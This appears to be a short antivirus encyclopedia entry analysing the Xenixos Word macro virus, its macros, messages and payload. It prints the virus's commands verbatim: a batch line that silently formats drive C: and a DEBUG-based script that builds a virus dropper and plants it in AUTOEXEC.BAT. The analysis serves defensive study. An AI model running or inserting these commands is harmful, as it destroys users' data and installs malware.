Virus.MSWord.Xenixos

Class Virus
Platform MSWord
Description

Technical Details


It is encrypted virus. It contains the macros:


Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden,
DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.

In some cases it sets the password “xenixos” for infected documents,
displays the message:

Diese Option ist derzeit leider nicht verf�gbar.
Fehler

While printing the documents it appends:

Brought to you by the Nemesis Corporation, L1996

On 1st of may the virus writes the string to the AUTOEXEC.BAT file:

@echo j|format c: /u >nul

This virus also launches “Neurobasher.b” multipartite virus. To do that the
virus creates the C:DOSSCRIPT.SCR file, and writes hexadecimal dump
of that virus into there. Then the virus creates the C:DOSEXEC.BAT file,
and writes the strings into there:

@echo off
debug < script.scr>nul
rem debugger.com
echo @c:dosdebugger.exe>>c:autoexec.bat
del c:dosscript.scr
del c:dosexec.bat

Then the virus executes that file. As the result DEBUG.EXE creates the
DEBUGGER.EXE file, and C:AUTOEXEC.BAT has new string at its end:

@c:dosdebugger.exe

So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b”
virus.